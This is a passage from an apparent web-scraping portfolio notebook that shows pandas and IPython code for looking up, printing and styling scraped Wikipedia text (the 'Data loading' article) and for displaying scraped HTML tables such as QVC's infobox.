87 International co-operation in the W3C Web Accessibility Initiative led to simple guidelines that web content authors as well as software developers can use to make the Web accessible to persons who may or may not be using assistive technology. 85 88 The W3C Internationalisation Activity assures that web technology works in all languages, scripts, and cultures. 89 Beginning in 2004 or 2005, Unicode gained ground and eventually in December 2007 surpassed both ASCII and Western European as the Web's most frequently used character encoding. 90 Originally RFC 3986 allowed resources to be identified by URI in a subset of US-ASCII. RFC 3987 allows more characters—any character in the Universal Character Set—and now a resource can be identified by IRI in any language. 91 |
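Each row of the display above is identified by its index number (the leftmost value, e.g., 697 for the Web scraping / World Wide Web row). If the display is too long to scan by eye, you can also look an index number up programmatically. The optional sketch below assumes the final_data DataFrame and its scraped_url column used throughout this project:
# Look up the index number of a page of interest by matching part of its URL,
# instead of scrolling through the display above.
matches = final_data.index[final_data['scraped_url'].str.contains('Data_loading', na=False)]
print(matches.tolist())   # e.g., [191] for the Wikipedia "Data loading" article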
To view the complete scraped text for any row, use print() with final_data['scraped_text'] and .iloc[]. Simply find the index number of the row in the display above that contains your web page of interest, and enter that index number in .iloc[]. E.g., if you are interested in viewing the extracted text from Wikipedia's article on "Data Loading" (index 191), located at https://en.wikipedia.org/wiki/Data_loading, you would use the following code:
print(final_data['scraped_text'].iloc[191])
Data loading, or simply loading, is a part of data processing where data is moved between two systems so that it ends up in a staging area on the target system. With the traditional extract, transform and load (ETL) method, the load job is the last step, and the data that is loaded has already been transformed. With the alternative method extract, load and transform (ELT), the loading job is the middle step, and the transformed data is loaded in its original format for data transformation in the target system. Traditionally, loading jobs on large systems have taken a long time, and have typically been run at night outside a company's opening hours. Two main goals of data loading are to obtain fresher data in the systems after loading, and that the loading is fast so that the data can be updated frequently. For full data refresh, faster loading can be achieved by turning off referential integrity, secondary indexes and logging, but this is usually not allowed with incremental update or trickle feed. Data loading can be done either by complete update (immediate), incremental loading and updating (immediate), or trickle feed (deferred). The choice of technique may depend on the amount of data that is updated, changed or added, and how up-to-date the data must be. The type of data delivered by the source system, and whether historical data delivered by the source system can be trusted are also important factors. Full data refresh means that existing data in the target table is deleted first. All data from the source is then loaded into the target table, new indexes are created in the target table, and new measures are calculated for the updated table. Full refresh is easy to implement, but involves moving of much data which can take a long time, and can make it challenging to keep historical data. 1 Incremental update or incremental refresh means that only new or updated data is retrieved from the source system. 2 3 The updated data is then added to the existing data in the target system, and the existing data in the target system is updated. The indices and statistics are updated accordingly. Incremental update can make loading faster and make it easier to keep track of history, but can be demanding to set up and maintain. 1 Tricle feed or trickle loading means that when the source system is updated, the changes in the target system will occur almost immediately. 4 5 When loading data into a system that is currently in use by users or other systems, one must decide when the system should be updated and what will happen to tables that are in use at the same time as the system is to be updated. One possible solution is to make use of shadow tables. 6 7
To display the same text (.iloc[191]) with prettier font styling, use the following code, which implements the <pre> tag and escape() steps used earlier:
display(HTML(f"<pre style='font-family: Georgia, serif; font-size: 18px;'>{html.escape(final_data['scraped_text'].iloc[191])}</pre>"))
Data loading, or simply loading, is a part of data processing where data is moved between two systems so that it ends up in a staging area on the target system. With the traditional extract, transform and load (ETL) method, the load job is the last step, and the data that is loaded has already been transformed. With the alternative method extract, load and transform (ELT), the loading job is the middle step, and the transformed data is loaded in its original format for data transformation in the target system. Traditionally, loading jobs on large systems have taken a long time, and have typically been run at night outside a company's opening hours. Two main goals of data loading are to obtain fresher data in the systems after loading, and that the loading is fast so that the data can be updated frequently. For full data refresh, faster loading can be achieved by turning off referential integrity, secondary indexes and logging, but this is usually not allowed with incremental update or trickle feed. Data loading can be done either by complete update (immediate), incremental loading and updating (immediate), or trickle feed (deferred). The choice of technique may depend on the amount of data that is updated, changed or added, and how up-to-date the data must be. The type of data delivered by the source system, and whether historical data delivered by the source system can be trusted are also important factors. Full data refresh means that existing data in the target table is deleted first. All data from the source is then loaded into the target table, new indexes are created in the target table, and new measures are calculated for the updated table. Full refresh is easy to implement, but involves moving of much data which can take a long time, and can make it challenging to keep historical data. 1 Incremental update or incremental refresh means that only new or updated data is retrieved from the source system. 2 3 The updated data is then added to the existing data in the target system, and the existing data in the target system is updated. The indices and statistics are updated accordingly. Incremental update can make loading faster and make it easier to keep track of history, but can be demanding to set up and maintain. 1 Tricle feed or trickle loading means that when the source system is updated, the changes in the target system will occur almost immediately. 4 5 When loading data into a system that is currently in use by users or other systems, one must decide when the system should be updated and what will happen to tables that are in use at the same time as the system is to be updated. One possible solution is to make use of shadow tables. 6 7
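If you expect to pretty-print several pages this way, the same display logic can be wrapped in a small reusable helper. This is an optional sketch, not part of the scraping pipeline itself; show_scraped_text is a hypothetical name, and the code assumes the final_data DataFrame with the scraped_url and scraped_text columns shown above:
from IPython.display import display, HTML
import html

def show_scraped_text(i, font='Georgia, serif', size=18):
    # Pretty-print the cleaned text scraped for row i of final_data (assumed to exist in the notebook).
    row = final_data.iloc[i]
    display(HTML(f"<b>Scraped URL:</b> {html.escape(row['scraped_url'])}"))
    display(HTML(f"<pre style='font-family: {font}; font-size: {size}px;'>"
                 f"{html.escape(row['scraped_text'])}</pre>"))

# Same output as the cell above, but reusable for any row
show_scraped_text(191)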
"""
from IPython.display import display, HTML
# Display the HTML tables, along with their URLs, from the first 5 scraped URLs by using .head().
for index, row in final_data.head().iterrows():
    # Display the original URL and the scraped URL from which the tables were extracted
    display(HTML(f"<b>Original URL:</b> {row['original_url']}<br><b>Scraped URL:</b> {row['scraped_url']}"))
    # Check if there is any HTML table to display
    if row['scraped_tables']:
        display(HTML(row['scraped_tables']))
    else:
        display(HTML("<p>No tables found.</p>"))
    # Display a thick black line as a separator after each URL's data before moving on to the next
    if index < len(final_data) - 1:  # Ensure the line is not added after the last item
        display(HTML('<hr style="border: 2px solid black;">'))
"""
If you remove .head() from final_data.head().iterrows() in the above code, it will show all tables from all scraped URLs (i.e., nearly 700 URLs) saved in the final_data object. However, if you have scraped many URLs, as is the case in this portfolio project, doing so will likely overload your memory.
from IPython.display import display, HTML
# Directly access the row in which the index number is 58 (iloc[58]), which shows all extracted tables from
# the Wikipedia web page on QVC.
row = final_data.iloc[58]
# First display the original URL and the scraped URL from which the tables were extracted
display(HTML(f"<b>Original URL:</b> {row['original_url']}<br><b>Scraped URL:</b> {row['scraped_url']}"))
# Check if there are any HTML tables to display. If so, display them.
if row['scraped_tables']:
    display(HTML(row['scraped_tables']))
else:
    display(HTML("<p>No tables found.</p>"))
Country | United States |
---|---|
Broadcast area | Worldwide |
Headquarters | 1200 Wilson Drive, West Chester, Pennsylvania 19380 |
Programming | |
Language(s) | English |
Picture format | 2160p UHDTV 1080i HDTV (downscaled to letterboxed 480i for the SDTV feed) |
Ownership | |
Owner | Qurate Retail Group |
Sister channels | (see below) |
History | |
Launched | November 24, 1986[1] |
Links | |
Website | qvc.com |
Availability | |
Terrestrial | |
ABC Owned Television Stations | -DT4 channel position; list of stations |
Over-the-air as a subchannel | Consult local listings |
Streaming media | |
QVC | Live Stream |
Apple TV & Amazon Fire TV | QVC app (all QVC networks) |
Roku | QVC/HSN app (all QVC & HSN networks) |
Frndly TV | Internet Protocol television |
Ownership | |
---|---|
Sister channels | (see above) |
History | |
Launched | August 22, 2013 |
Former names | QVC Plus (2013–2017) |
Links | |
Website | qvc.com |
History | |
---|---|
Launched | April 1, 2019 |
Links | |
Website | qvc.com |
History | |
---|---|
Launched | April 23, 2019 |
Former names | Beauty iQ (2019-2021) |
Links | |
Website | qvc.com |
QVC Group | |
---|---|
Liberty Ventures Group |
|